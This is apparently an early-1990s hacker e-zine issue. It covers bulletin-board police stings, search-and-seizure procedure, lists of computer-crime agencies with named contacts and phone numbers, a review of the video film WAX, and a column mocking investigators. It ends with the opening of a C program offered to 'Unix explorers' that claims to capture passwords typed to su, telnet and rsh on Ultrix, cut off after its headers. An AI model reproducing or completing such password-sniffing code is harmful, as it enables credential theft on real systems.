---------------------

While most bulletin boards have been established for legitimite purposes there
are also "pirate" or "elite" boards that contain illegal information or have
been established for an illegal activity. Security on these boards is tightly
controlled by the owners. With these bulletin boards, users usually have to
contact the owner directly to obtain a password for access to different levels
of the system. A degree of trust must therefore be established before the
owner will allow access to the board, and the owners develop power over who can
use the system.

These boards have a variety of information on them including the following:

* Stolen credit card account numbers
* Long distance telephone service codes
* Telephone numbers to main frame computers, including passwords
* Procedures for making illegal drugs and explosives
* Hacking programs
* Tips on how to break into computer systems
* Schematics for electronic boxes (e.g. Blue Box)

These boards are obviously a threat to communities, and their exsistance has
gained the attention of police departments.

Sting Operations with Bulletin Boards

Members of the Maricopa County,Arizona, Sheriff's Department were the first in
the country to establish such a board. Their board resulted in over 50 arrests
with the usual charge being telecommunications fraud. In September, 1985, the
Fremont Police Department established a bulletin board for the primary purpose
of gathering intelligence on hackers and phreakers in the area. The operation
was partially funded by VISA, Inc., with additional support from Wells Fargo
Bank, Western Union, Sprint, MCI, and ITT.

After Establishing their bulletin board, They advertised it on other boards as
the newest "phreak board" in the area. Within the first four days over 300
calls were received on the board. During the next three months, the board
logged over 2,500 calls from 130 regular users. Through the bulletin
board,they persuaded these groups that they had stolen or hacked long-distance
telephone service codes and credit card account numbers. (provided by the
aforementioned companies). They were readily accepted and were allowed access
to other pirate boards in the area.

The board was operated for a total of three months. During that period, over
300 stolen credit card account numbers and long distance telephone service
codes were recovered. Passwords to many government, educational, and corporate
computers were also discovered on other boards.

The operation resulted in the apprehension of eight teenagers in the area who
were charged with trafficking in stolen credit card accounts, trafficking in
stolen long distance telephone service codes, and possession of stolen
property. Within the next week, seven more teenagers in California and other
states were arrested based on information from this operation.

It was estimated that this group had been illegally accessing between ten and
fifteen businesses and institutions in California. They were regularly
bypassing the security of these systems with stolen phone numbers and access
codes. One victim company estimated that it intended to spend $10,000 to
improve its security and data integrity procedures. Other victimized
businesses were proceeding along the same lines.

Conclusions

There are several reasons for conducting Sting operations of this type. One of
the most important is that it provides a proactive method of identifying
hackers and phreakers in the area. These groups are particularly hard to find
since they operate in closed circles with personal networks developed from
friendships.

Another byproduct of these operations is the publicity surrounding the cases.
Sting operations result in a considerable amount of attention from the media.
The publicity has the effect of closing down other pirate boards in the area.
One of the greatest fears of these offenders is that their systems will be
taken, and in the Fremont operation over $12,000 of computer equipment was
seized. The publicity associated with these seizures seems to be the primary
reason for others to stop their pirate boards.

These operations also lead to other types of offenses. In Fremont, for
example, drug and alcohol cases were developed as a result of the Sting
operation. This has been typical of these operations.

The Sting operations with bulletin boards have been criticized because
teenagers, rather than hardened criminals, are arrested. Many hackers believe
that they have a right to the data in other systems and that their activities
are not illegal since the companies can afford the losses. On the other hand,
as one investigator observed, the hackers of today may be the sophisticated
computer criminals of tomorrow. It is therefore important to set a lesson
early in their careers steering them away from these offenses.


Public Sector Computer Crime Associations
-----------------------------------------

Federal Computer Investigations Committee (FCIC)
c/o U.S. Secret Service Fraud Division, Room 942
1800 G Street, N.W. Washington, D.C. 20223
Phone: (202) 535-5850
Steve Purdy
This committee is compromised of representatives from federal military
and civilian law enforcement. This organization meets three times a year
for the purpose of enhancing techniques to investigate computer related
crimes. The committee strives to develop universal guidelines for these
types of investigations. Membership is diverse (U.S. Secret Service,
IRS,FBI,Department of Defense, CID, AFOSI, NIS, Department of Labor, and
others)

High Tech Crime Investigator's Association (HTCIA)
c/o L.A. County Sheriff's Department (Forgery/Fraud Detail)
11515 South Colima Road, Rm. M104
Whittier, California 90604
Phone: (213) 946-7212
Jim Black- President
Members include federal, state and local law enforcement personnel as
well as security managers from private industry. The association brings
together private industry and law enforcement officials in order to
educate each other about computer related crimes.

Colorado Association of Computer Crime Investigators
c/o Larry Scheideman
Lakewood Police Dept.
Lakewood, Colorado 80226-3105
Phone: (303) 987-7370
Founded: 1986 A professional organization including federal, state, and
local law enforcement personnel and those persons from the private
sector concerned with computer crime. The association assists law
enforcement agencies with resource allocation and
intelligence/investigation of computer related crimes. The association
also provides training on an individual basis.

Law Enforcement Electronic Technology Assistance Committee (LEETAC)
Office of the State Attorney
700 South Park Avenue
Titusville, Florida 32781
Phone: (407) 269-8112
Jim Graham
The organization is comprised of 10 prosecutors from the State's
Attorney's office, 13 officers representing each municipality in the
county, 2 representatives from the sheriff's department, and Nassau.
They provide technical expertise to law enforcement regarding computer
crimes.

International Association of Credit Card Investigators (IACCI)
1620 Grant Avenue
Norato, California 94945
Phone: (415) 897-8800
D.D. Drummond Executive Director
Founded: 1968 Members: 2700 Special agents, investigators, and
investigation supervisors who investigate criminal violations of credit
card laws and prosecute offenders; law enforcement officers, prosecutors
or related officials who investigate, apprehend and prosecute credit
card offenders. The association's objective is to aid in the
establishment of effective credit card security programs; to suppress
fraudulent use of credit cards; and to detect and proceed with the
apprehension of credit card thieves.

Economic Crime Investigators Association (ECIA)
Glendale Police Dept.
7119 N. 57 Drive
Glendale, Arizona 85301
Phone: (602) 931-5511
Wayne Cerow
Members include law enforcement and regulatory personnel. The
association focuses on economic crime, including computer related
crimes. The association holds a yearly training seminar in order to
exchange information, ideas and data on new technological advances.

Institute of Internal Auditors (IIA)
249 Maitland Avenue
Altamonte Springs, Florida 32701
Phone (407) 830-7600
Founded: 1941. Members: 30,000. Staff: 74 Local Group: 183 Professional
organization of internal auditors, comptrollers, accountants, educators
and computer specialists. Individual members have assisted both
state/local police with investigations involving computer crime.

Computer Law Association, Inc.
8303 Arlington Boulevard, Suite 210
Fairfax, Virginia 22031
Phone: (703) 560-7747
Founded: 1973. Members 1200. Lawyers, law students, and others
interested in legal problems related to computer communications
technology. The association sponsors continuing legal education on
computer law. CLA also publishes a reference manual which lists
organizations involved with computer law.

Communications Fraud Control Association (CFCA)
P.O. Box 23891
Washington, D.C. 20026
Phone: (703) 848-9760
Rami Abuhamdeh (executive director)
A security organization involved in investigations of telecommunications
fraud. Membership includes (a) individual and corporate, (b) associate
individual, and © vendor.

National Center for Computer Crime Data (NCCD)
2700 North Cahuenga Boulevard
Los Angeles, California 90068
Phone: (213) 874-8233
Jay BloomBecker (director)
Founded: 1978. The center disseminates data and documents in order to
facilitate the prevention, investigation and prosecution of computer
crime. The center sponsors speakers and seminars. The center is also
involved in conducting research and compiling statistics.

Mis Training Institute
Information Security Program
498 Concord Street
Framingham, Massachusetts 01701
Phone: (508) 879-7999
Information security seminars for information security professionals,
EDP auditors, and data processing management. The institute provides
both training and consulting services, and has assisted local police in
investigations of computer-related crimes.

Computer Virus Industry Association
4423 Cheeney Street
Santa Clara, California 95054
Phone: (408) 988-3832
John McAfee (Executive director)
Founded: 1987. Objective is to help identify, and cure computer viruses.
The association has worked with state and local law enforcement agencies
in the investigation and detection of computer related crimes.

Information Systems Security Association (ISSA)
P.O. Box 71926
Los Angeles, California 90071
Phone: (714) 863-5583
Carl B. Jackson
Founded: 1982. Members: 300. Computer security practitioners whose
primary responsibility is to ensure protection of information assets on
a hands-on basis. Members include banking, retail, insurance, aerospace,
and publishing industries. The association's objective is to increase
knowledge about information security. ISSA sponsors educational
programs, research, discussion, and dissemination of information. The
association has regional and state chapters.

SRI International
Information Security Program
333 Ravenswood Avenue
Menlo Park, California 94025
Phone: (415) 859-2378
Donn B. Parker
Founded: 1947. A staff of senior consultants and computer scientists
preform research on computer crime and security and provide consulting
to private and government clients worldwide. A case file of over 2,500
computer abuses since 1958 has been collected and analyzed. It is
available for use by criminal justice agencies and students FREE of
charge. An electronic bulletin board, Risks Forum, is operated and
sponsored by the Association for Computing Machinery to collect and
disseminate information about risks in using computers.


List of addresses for more Computer Crime information
-----------------------------------------------------

Mr. Anthony Adamski, Jr.
Federal Bureau of Investigation
Financial Crimes Division
Room 3841
10th Street and Pennsylvania Avenue,N.W.
Washington, D.C. 20535
(202) 324-5594

Mr. James R. Caruso
AT&T Corporate Security
Room 4B03
20 Independance Boulevard
Warren, NJ 07060
(201) 580-8304

Mr. J. Thomas McEwen
Institute for Law and Justice, Inc.
1018 Duke Street
Alexandria, VA 22314
(703) 684-5300

Mr. Ken McLeod
504 Edison Avenue
Buckeye, AZ 85326
(602) 935-7220

Sergeant William F. Nibouar
Technical Crimes Investigation
Maricopa County Sheriff's Office
102 West Madison
Phoenix, AZ 85003
(602) 256-1000

Mr. Donn B. Parker
SRI International
333 Ravenswood Avenue
Menlo Park, CA 94025
(415) 859-2378

Mr. James Fitzpatrick
Assistant District Attorney
Philadelphia District Attorney's Office
Economic Crimes Section
1421 Arch Street
Philadelphia, PA 19102
(215) 686-8735

Detective Calvin Lane
Computer Crime Unit
Baltimore County Police Department
400 Kenilworth Avenue
Towson, MD 21204
(301) 887-2225

Detective Larry L. Scheideman
Intelligence Division
Lakewood Police Department
445 South Allison Parkway
Lakewood, CO 80026-3105
(303) 987-7370
BBS (303) 987-7388 1200 baud no parity and 1 stop bit

Mr Jonathan Budd, Project Monitor
National Institute of Justice
633 Indiana Avenue, N.W., Room 801
Washington, D.C. 20531
(202) 272-6040

Special Agent Stephen R. Purdy
United States Secret Service
Fraud Division
1800 G Street, N.W.
Washington, D.C. 20223
(202) 535-5850

These people were major contributors to these books


Advance Preparations and the Actual Search
------------------------------------------

I. Investigative Techniques

A. Record Checks:

1. Attempt to learn as much information about the
personal computer owner as possible, such as:

a. Number of occupants in the private residence
and their relationships.
b. Employment and educational background to determine
which resident is likely to be a computer user.

2. Review telephone records:

a. Often computer sites have multiple lines (e.g.,
one for the bulletin board operation, one for
outbound data traffic, and one for voice .
b. Long-distance dialing company records are valuable
for determining long-distance access code abuse.

B. Informants:

1. Use the informant to acquire evidence before a search
warrant is prepared.

2. Use the informant to better understand the computer habits,
skills, and knowledge of the suspect; identify:

a. Time of operation of target computer.
b. Nature and frequency of illegal activity.
c. Type of computer system used by the suspect.
d. Identity of criminal associates or conspirators.
e. Occupations and employers of suspects and other
people on the premises.

C. Surveillance of computer facilities

D. Pen register or dialed-number recorder (DNR):

1. If telephone access codes are being abused, use pen
registers or DNRs to gather documentation. Frequently,
a prosecutable case is made through the application of
this technique alone.

2. Use this technique to obtain additional criminal
intelligence on additional suspects, target computer
systems, and the extent of computer use.

E. Undercover computer communications with targeted system
and suspects:

1. Consider setting up an electronic bulletin board operation
or attractive host computer that the suspect can access or
attack. However, this method is costly and requires a
substantial commitment of personnel to monitor the
operation.

2. If the suspect maintains his own electronic bulletin board,
consider the feasibility of using a computer to gain
access to his system within the provisions of the
Electronic Communications Privacy Act of 1986 (PL 99-508).
Frequently,suspects allow others to access their systems,
which may contain unauthorized credit card information,
hacking data, and access code files. Consider consensual
use of an informant's access to the suspect's computer
system.

F. Monitoring of computer transmissions

G. False computer data base entries as an investigative tool:

1. Credit bureaus and credit card issuers frequently allow
false information to be "planted" in their data bases for
law enforcement use.

2. If the suspect uses this information, the investigator
can collect evidence through computer audit trails.

II. Supplies Needed to Execute a Search of a Personal Computer Site

A. Diskettes or portable data storage units:

1. Be prepared to copy files for temporary storage unto
5-1/4", 3-1/2", or 8" diskettes. Up to 100 diskettes
may be needed for large storage devices of 50 megabytes
or more. Diskettes should be preformatted to avoid
contamination when the suspect's computer is used.

2. Have a sufficient supply of tape cartridges. Some
compute systems include cartridge-tape decks used
for mass storage backup of hard disk information
or individual program storage.

3. Have plenty of evidence tape, adhesive labels, or some
other means of write protecting the disks.

4. Have a set of utility computer programs for target
computers to retrieve data files.

B. Adhesive colored labels for use in identifying and
cataloging evidence (usually supplied with new diskettes):

1. Place labels on diskette copies specifying the access
commands,the operating system name in which the disk is
formatted, perhaps the program application used to create
the data, and the case or file number of the investigation.

2. These labels are distinctly different from evidence labels
d suspect is cooperative and identifies diskettes
containing incriminating information, write protect them,
then review them on site, and print one or two of the
incriminating files. At this point, print only enough
to establish the basis for the violation. If several
diskettes are to be examined, label them appropriately.

2. If the suspect is not cooperative, attempt to identify
diskettes that may contain incriminating information by
examining the suspect's diskette labels. If the
questionable diskettes are located, write protect them
and print the directory of each diskette, and the contents
of a questionable file. Again, if a number of diskettes
are to be examined, label them.

3. Show the printout to the suspect, after he has been
properly advised of his rights, for possible use in
obtaining a confession.

4. If no further review of the diskettes is nessecary on site
assemble and secure computer programs and documentation
(much of it may be pirated) for inventory and transport to
a storage site.

D. Label the cables connecting various devices to aid in the
reassembly of the system at a later time.

E. Photograph the labeled equipment and cables.

F. Disassemble, tag, and inventory the equipment.

G. Carefully pack seized devices in suitable containers for
transport.

VI Reassembling System at a Remote Location

A. Write-protect all diskettes prior to review, which preserves
the integrity of the evidence examination process and
prevents erasing or accidental damage to information on the
seized diskettes during the review process.

B. Review all seized diskettes.

1. Create a diskette log containing the following headings:
"Diskette Number,""Contents," and "Disposition."

2. Using colored adhesive labels, label each diskette with
a letter of the alphabet, followed by a numeral
sequentially assigned to each diskette reviewed
(e.g., a-1.a-2.a-3). The letter could correspond
to the room where the diskette was located, or it
may correspond to one of many suspects in a case,
for example.

3. Review each diskette and enter its assigned number on the
diskette log.

4. Under the "Contents" column of the log, briefly describe
the diskette contents (e.g., games,credit card
information, access code files).

5. Print a directory of the diskette and label the printout
with an adhesive label bearing the same alphanumeric
designation as the diskette.

6. Determine from the directory which files listed are to be
reviewed.

7. Review questionable files for incriminating information
or copyright violations.

8. If incriminating information is located, print the file
contents and label the printout with an adhesive label
bearing the same alphanumeric designation as the diskette
and the directory printout.

9. Copy the incriminating files onto a formatted blank
diskette established by the reviewing person specifically
for that purpose. Label it appropriately as a copy for
backup purposes.

10. Enter in the "Disposition" column of the diskette log the
action taken with respect to the diskette (e.g., directory
printed,files printed, incriminating information obtained,
file copied).

11. Do not be in a hurry. Although extremely time consuming
and tedious, this process is essential for preserving
evidence and locating it easily during a court case.

C. Review printouts seized on site and those printed from review
of computerized information to determine the appropriate
investigative follow-up

D. Store original diskettes in a safe location, free from
magnetic fields, excessive humidity, or severe temperatures.

E. If the suspect has placed the information on the diskette
using some type of commercial program package
(e.g., D-base III, Lotus), copy the target or incriminating
file onto a separate diskette.Then, and only then, should any
attempt be made to manipulate the information in the file to
a readable or usable format.Even then, the copy of the file
should be used and not the original data.

F. Some of the suspect's critical files may be encrypted, which
would be shown a strings of meaningless characters. If so,
attempt to locate the encryption program or security plug-in
circuit board and description manuals. Attempting to break the
code without the key will be fruitless unless the crypto-
algorithm is extremely simple. If the most well known crypto
algorithm DES (Digital Encryption Standard) was used and a
clear text and a matching encrypted text is available where
the secret key was used, a competent cryptoanalyst could
discover the key using several hours of a Cray 2 computer (the
fastest available) but at a great expense.

G. File subdirectories and files may be stored in a "hidden"
status or "erased" but still present on the disk. Use
commercial utility programs that can search for and obtain
files of this nature.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

"WAX or the discovery of television among the bees"

This is information on a new full length film created with new techniques
destined to make it a pilot for a new breed of cyber-cinema. It was
contributed by the film's creator, David Blair.

CONTACT:
David Blair
P.O. Box 174, Cooper Station, New York, NY 10276
(212) 228 1514

"WAX or the discovery of television among the bees" is set in Alamogordo,
New Mexico (1983), where the main character, Jacob Maker, designs gunsight
displays at a flight simulation factory. Jacob also keeps bees. His hives are
filled with "Mesopotamian" bees that he has inherited from his grandfather.
Through these bees, the dead of the future begin to appear, introducing Jacob
to a type of destiny that pushes him away from the normal world, enveloping him
in a grotesque miasma of past and synthetic realities. The bees show Jacob the
story of his grandfather's acquisition and fatal association with the
"Mesopotamian" bees, in the years following the First World War. The bees also
lead Jacob away from his home, out to the Alamogordo desert, slowly revealing
to him their synthetic/mechanical world, which exists in a darkness beyond the
haze of his own thoughts. Passing through Trinity Site, birthplace of the
Plutonium bomb, Jacob arrives at a gigantic cave beneath the desert. There, he
enters the odd world of the bees, and fulfills his destiny. Traveling both to
the past and the future, Jacob ends at Basra, Iraq, in the year 1991, where he
meets a victim that he must kill.

Independently executed over six years, "WAX or the discovery of television
among the bees" combines compelling narrative, in the realistic/fantastic vein
of Thomas Pynchon or Salman Rushdie, with the graphic fluidity of video
technique. The result is an odd, new type of story experience, where smooth
and sudden transpositions of picture and sound can nimbly follow and fuse with
fantastical, suddenly changing, and often accelerated narrative. The result
resembles story-telling in animated film. Yet location photography and archive
research form the backbone of the piece.

"WAX or the discovery of television among the bees" (85:00, mono) provides
an example of a new type of independent "electronic cinema" that will become
more common as the 1990's progress.

Review for
"WAX or the discovery of television among the bees"

from the magazine "MONDO 2000"
(to be printed in Volume 7 in August 1992)
article by Richard Kadrey

Throughout the history of the film biz there have been occasional
attempts to shoot whole novels. The silent era gave us Greed, a 12-hour
misery-fest that was ultimately chopped up and sold as guitar picks by the
studio heads. Fassbinder was more successful with his 15-hour Berlin
Alexanderplatz, but that was shown in installments on TV, so the accumulation
of action and information was greatly diminished.

In the literary world, J.G. Ballard experimented with "condensed
novels" in his book The Atrocity Exhibition. The idea was to boil away all
character and plot and leave just the steaming residue of motive, action and
response, to create the cumulative effect of novel-like density in just a few
pages.

David Blair's video, WAX or the Discovery of Television Among the Bees,
is sort of a combination of these earlier experiments, and yet is something
wholly new. Through a combination of archival film footage, new video and
computer animation WAX achieves the effect of a novel (density, the passage of
time, dramatic changes in character), and it does so in the 85 minute
running-time of a regular feature film.

It's almost impossible to describe the plot of WAX; it's a Zen koan
told as a Burroughs cut-up. We open with experimental cinematographer James
Maker, a member of the Supernormal Film Society who accompanies a British Royal
expedition to Antarctica in hopes of filming the spirits of the dead.
Flashfoward to James Maker's grandson, Jacob Maker, a computer programmer
working on targeting systems for the Air Force at their Alamagordo test range.
Jacob keeps bees, the bees that once belonged to his father and grandfather, a
semi-famous keeper of bees himself, friend of the man who first imported
Mesopotamian bees to England. Jacob grows unsure of the work he is doing for
the Air Force, telling us that "To hit a simulated target was to prepare murder
against a real target." As his uncertainty grows, he spends more and more time
with the bees. He has blackouts; time turns liquid, and he loses hours at a
time. The hives are endlessly fascinating to him. And then one day, he thinks
he can hear voices speaking to him from inside the hives. . . .

After that, Jacob quickly leaves behind almost everything we would
consider normal life and embarks on a Ballardian quest that takes him from his
home in Alamagordo, to Trinity site (location of the first nuclear bomb was
detonation, coincidentally on the day of Jacob's birth), to the underground
lair that is the real home of the bees (where the bees commune with the dead,
and prepare new bodies for them), to the Land of the Dead itself and to Iraq
during the Gulf War where Jacob is reborn briefly as a bomb, guiding himself
with the same targeting system he worked on back when he was a programmer.

Blair labored for six years to finish WAX, working when he could from
grant to grant, scrounging and convincing people to contribute to the project
through the force of his vision, the strength of which is evident in the
extraordinary production quality of WAX. The scenes set in Alamagordo and
Trinity Site were really filmed at those locations. Blair convinced the Air
Force to let him take his video crew deep inside the highly restricted WSMR
bomb range. On the day Blair and company were shooting, a celebration was on
nearby, an annual party marking the anniversary of the first nuclear bomb test.
Technicians set off a small chemical explosive, sending up a tall, white
mushroom cloud, a moment captured by chance by cinematographer Mark Kaplan, and
incorporated by Blair into the finished film. Stealth bombers practiced bomb
runs over the shooting site, using the Trinity marker as ground zero on their
targeting grids-- Blair and his crew were being virtually bombed the whole time
they were filming.

Another striking sequence in WAX is the underground cavern where the
bees make wax bodies for the dead to inhabit. Blair shot these scenes in
off-limit locations inside Carlsbad Caverns, conning and cajoling his way into
sectors of cave that even the park rangers generally avoid. It's during this
act that Jacob enters the Land of the Dead, and the audience gets a tour of the
afterlife via Florence Ormezzano's lovely computer graphics. WAX neatly avoids
the problems of mainstream films like Lawnmower Man where films and effects
live and die by their flash quotient. WAX refuses to compete with Hollywood's
ideas of special effects. The computer images we get are startling, from the
bat-winged and multi-skulled spirit guide to the biomorphic squiggles that are
the alphabet of the dead. These are dream images from a lost digital tribe,
pixelated runes and hieroglyphs. Imagine what the Maya might have left behind
if they had vanished into a virtual world instead of the Mexican jungle.

WAX is the first generation of a new video-based artform that Blair
calls is "independent electronic cinema." Like home-recording studios and the
zine world (like the zine you hold in your hands) recent advances in technology
have put powerful editing tools into the hands of anyone with the need and
desire to use them. WAX was assembled using the Montage Picture Processor, a
relatively new "non-linear" video editing system, which allowed Blair to work
quickly and intuitively, digitally cutting and pasting the work together from
as many as six video segments at once.

Both Blair and WAX, however, are having to pay a price for their
ambition. Nobody wants to show or distribute WAX. The art video crowd has
rejected it because it's too long and too expensive, a PC no-no. The film
community is strictly hands-off because WAX is video-based. This is almost
always the fate of the new. Tuxedoed and tiaraed royals rioted at the premier
of the Rite of Spring. Henry Miller, Allen Ginsberg and Burroughs were all
banned at one time for obscenity. And the Elvis was shot from the waist up
because white boys weren't supposed to move like that.

And who can really blame the critics? The New is always frightening.
It makes you look at everything, your own work included, in a different way.
It makes you question your methods, your ideas, all your assumptions. Worse,
the New can make you feel old, and when you're in art, where coolness and
affect are half the game, old is not where the beautiful people are hanging
out.

Blair is optimistic, though. With praise from the likes of William
Gibson, he knows that he accomplished want he set out to do. He's already at
work on a new feature, an alternate history piece linking the fate of the
modern Japanese and Jews in an alternate Israel located in Manchuria. Not
exactly the kind of material destined to give Terminator 9 a run for its money,
but Blair is playing in a different league, where film has the density of a
novel, where new thoughts are always welcome and where memories, dreams and
desires are as close as your skin, and as dangerous as a smart bomb.

TECHNICAL PROFILE:

"WAX or the discovery of television among the bees" demonstrates the
narrative and visual forms that are emerging as the wide availability of new
technologies make possible an independent "electronic cinema". Though the
specific combination of story, production work, post-production work, and sound
design that make up "Wax..." are unique, there is no doubt that the increased
availability of the technologies used in this project will lead to the creation
of new ways of making feature- length narrative, at which time "Wax..." will
become an example of a type, rather than an idiosyncratic phenomena.

ELECTRONIC PRODUCTION:
High quality video production is already an established fact. As has often
been noted, the ability to shoot cheaply allows a director the ability to
sketch out story ideas, even under the pressures of location production.

Over fifty hours of location material were recorded for "Wax...". There were
three production periods, totalling twenty days, spread over three years. The
location work included travel to the a sculpture garden in central Kansas, and
to a wide variety of locations in Southwestern New Mexico, including such
restricted areas as the White Sands Missile Range, and the Carlsbad Caverns.

The ease of video duplication aided in stock footage collection.
In addition, small format video allowed the collection of archive
footage during travel.

ELECTRONIC POST-PRODUCTION: NON-LINEAR EDITING
The mass of material collected during video production and created during video
and computer effects work (see below) is difficult to organize and edit. This
bottle-neck was overcome by the extensive use of non-linear editing during
off-line. "WAX or the discovery of television among the bees" is the first
long- form independent production to fully exploit the capacities of this new
technology.

Organization of production material began early on at Film/Video Arts, a
non-profit media access center in NYC, where simple 3/4" editing equipment was
used. This work was shifted home when, in the course of the production,
inexpensive home editing equipment became available. A thermal video printer
allowed simple sorting and cataloguing of shots.

After the final shoot, all organized material was input to a Montage non-linear
editing system, where the real work of off- line editing began. More than 1800
hours were spent on this system.

Non-linear editing allows an editor to instantly rearrange, trim or lengthen
all shots within a sequence, while previewing simple opticals. On such a
system, a director can work at the levels of shot, sequence, and scene
simultaneously, allowing both the complete exploitation of large amounts of
production material, and the opportunity for associative patterning at all
levels. Off-line editing acquires both the speed and creative flexibility of
writing. "WAX or the discovery of television among the bees" is a clear
example of this new functionality.

ELECTRONIC POST-PRODUCTION: VIDEO GRAPHICS/COMPUTER GRAPHICS
As is already obvious in short-form work such as the television commercial and
music video, the combination of electronic post- production with computer
graphics allows a director both complete control over production material, and
the ability to integrate this footage with completely synthetic material, in an
artificial graphic space. "WAX or the discovery of television among the bees"
is the first independent production to harness these technologies for
fiction-feature storytelling.

Effects production began simultaneous with the initial production and editing
work. More than forty hours of processed material were recorded, using a wide
variety of image processing and image synthesis techniques. These ranged from
frame-based PC work, both 2-D and 3-D, to the real-time work, initially
executed on analog voltage-control systems at the Experimental Television
Center in Owego, N.Y.

Of special interest is the fact that a simple Amiga-based system was used to
create over 90 minutes of 3-D animated elements. In the final tape, there are
several long sequences of narrative 3-D animation, totalling almost ten
minutes.

Both the PC work, analog work, and the majority of the production material were
fed through a real-time 2-D/3-D joy- stick controlled, key-frame based device
called Impact, from Microtime. The machine was loaned to the production by the
manufacturer for 24 days, and installed at Film/Video Arts, NY. The
extraordinary plastic qualities of this easily programmed device provided,
within the shot, the same compositional flexibility that the non-linear editing
system provided across shots.

ELECTRONIC POST-PRODUCTION: MUSIC
At the completion of editing, the finished picture was given to the composers,
devoid of any production or stock sound. All eighty-five minutes of sound were
created from scratch by the pair, using samplers and other computer-based
instruments at their PC-automated audio-for-video studio. The inexpensive, yet
powerful, technologies of contemporary music allow the independent
composer/sound designer to create long-form works with a speed and
sophistication previously not possible.

INDEPENDENT "ELECTRONIC CINEMA"
At the current time, "WAX or the discovery of television among the bees" is an
unusual, perhaps idiosyncratic project, in the style, content, and length of
its' narrative, and in its' visual composition. However, these elements have
proceeded in unity with, and in many cases have been born from, the technical
aspects of its construction. It should be noted that, as the 1990's progress,
real-time 2-D and 3-D image processing and synthesis will become available in
affordable desktop computers. Inexpensive non-linear, PC-based editing systems
will replace cassette-based, mechanical systems. These new technologies,
combined with the already established practices of video production and
PC-based electronic music, will be the material basis for a new "electronic
cinema". As a wide range of producers gain the ability to investigate this
possibility, what is unusual here may become common.

Distribution for "WAX or the discovery of television among the bees" is planned
both on tape and on film.


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -




/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/- -/-
/-/ *> TID-BYTES <* /-/
-/- -/-
/-/ by the Informatik Staff /-/
-/- -/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/

Tid-Bytes is a standing column of miscellaneous bits of information.

This issue brings us a wordhunt, more info on those LOD t-shirts, and some
C-programs that I am sure will be of use to you Unix explorers.

"Spot the Fed!"
-by the staff-

Hiding out below are all sorts of undesirables. Search behind every two-way
mirror, potted plant, and light fixture (as well as diagonally, backwards, and
forwards) to locate them and the other terms listed below. [Thanks to KL, TK,
Vodka, Holistic, and everyone else...]

Wordlist
~~~~~~~

Klupfel - Henry Klupfel, Bellcore
Ames - Toni Ames, our buddy at Sprint
Maxfield - John Maxfield, in charge of several sting operations
Meola - Ralph Meola, AT&T
Foley - Tim Foley, Secret Service
Delaney - Donald Delaney, New York State Police, senior investigator
Clifford - Cliff Stoll, the cukoo, easy to spot, look for the hair
Geraldo - Geraldo Rivera, some sort of alien plague
Dale - Dale Drew, Tymnet Security
Thackeray - Gail Thackeray, Arizona prosecuter
Cook - William Cook, (ex)US prosecutor
Parker - Don Parker, security consultant
CERT - The Computer Emergency Response Team
Patrick - Patrick Farmer, Visionary, High-level informant
BellCore - bringing us new technology to explore
Sprint - Always tough
ATANDT - AT&T, quality you can depend on
confiscation - the game the feds are playing when they take your stereo away
RedBox - discount payphone device
informer - a narc, not a real popular buddy
phreak - a telecom enthusiast
probation - What you hope you get
jailtime - What you hope NOT to get
sting - a setup, the reason you don't leave your real info
raid - a friendly wakeup call
busted - gone down in history
arrest - you get to ride in a police car!
fraud - just a white lie
hacker - the root of all evil
warrant - "Warrant? We don't need no stinking warrants..."
magnum - popular device used to hold dangerous hackers at bay
police - do I smell bacon?
agents - friendly guys that don't know anything but have nice sunglasses
feds - big brother's helpers
officers - they protect and serve
SunDevil - The infamous operation Sun-Devil
Zardoz - CERT advisory compilations
cracker - politically correct term for hacker

___________________________________
| |
| Spot The Fed! |
| |
+---------------------------------+
| |
| t t m a g e n t s b a t y w m |
| r d d i e s m a g n u m n a e |
| s c d n r g n i t s d s e t o |
| p a e r a k n y n r d a t s l |
| r n l l l t e d a s e e p e a |
| i o a r d l a l r j a k f r d |
| n i n f o r m e r a d p c r r |
| t t e f e e c i a i u e o a s |
| h a y c o i r f w l r f d s h |
| a b o u f f a x k t f k u o p |
| c o n f i s c a t i o n a h a |
| k r o d e r k m l m d c r o y |
| e p o l i c e c r e i e f d r |
| r p a r k e r b v z a r d o z |
| a d a p a t r i c k r m c r c |
| y c i b e l l c o r e d b o x |
| |
+---------------------------------+




---------------------

LOD Shirts
by Erik Bloodaxe

With all the amazing hullabaloo going on in several newsgroups and throughout
the electronic community as a whole, I have decided to go ahead and make one
more, FINAL, print run on the LOD t-shirts.

Please, if anyone is interested, have your mail sent by the end of July, so
everyone who wants one can get one this time. I thought that in the 6 print
orders I made previously "Everyone" who wanted one got one, but from the
requests I have received apparently not.

I was amazed at the orders that came in from locations such as Hong Kong,
England, Netherlands and Australia. The list of luminaries who came out of the
woodwork with an interest in such item was equally as impressive, security
types at LLNL, government employees, hackers from the golden days, and even a
certain regular contributor to a few "not for normal distribution" mail lists.

This run is for those of you who got left out. Again, I urge that you respond
before July 31, as that is when it the opportunity ends forever.

Blatant promotion follows:

"LEGION OF DOOM--INTERNET WORLD TOUR" T-SHIRTS!

Now you too can own an official Legion of Doom T-shirt. This is the same shirt
that sold-out rapidly at the "Cyberview" hackers conference in St. Louis.
Join the other proud owners such as Lotus founder Mitch Kapor and award-winning
author Bruce Sterling by adding this collector's item to your wardrobe. This
professionally made, 100 percent cotton shirt is printed on both front and
back. The front displays "Legion of Doom Internet World Tour" as well as a
sword and telephone intersecting the planet earth, skull-and-crossbones style.
The back displays the words "Hacking for Jesus" as well as a substantial list
of "tour-stops" (internet sites) and a quote from Aleister Crowley. This
T-shirt is sold only as a novelty item, and is in no way attempting to glorify
computer crime.

Shirts are only $15.00, postage included! Overseas add an additional $5.00.
Send check or money-order (No CODs, cash or credit cards--evenrd) made payable
to Chris Goggans to:

Chris Goggans
5620 Glenmont #P-17
Houston, TX 77081


---------------------

Unix C-goodies
from cdmorgan

For you *nix explorers out there, here's a couple of interesting programs for
you to look at. They are untested, so have at it!

PROG1:

/* when run from a shell-escape in /bin/mail, this program is able to
read any password given to su, telnet, rsh by any user.
Works on Ultrix 4.0-4.2 with no mods */

#include <stdio.h>
#include <machine/pte.h>
#include <sys/param.h>
#include <sys/dir.h>
#include <sys/user.h>
#include <sys/proc.h>
#include <sys/conf.h>
#include <sys/tty.h>
#include <nlist.h>
#include <pwd.h>

static int kmem = -1, mem = -1 ;
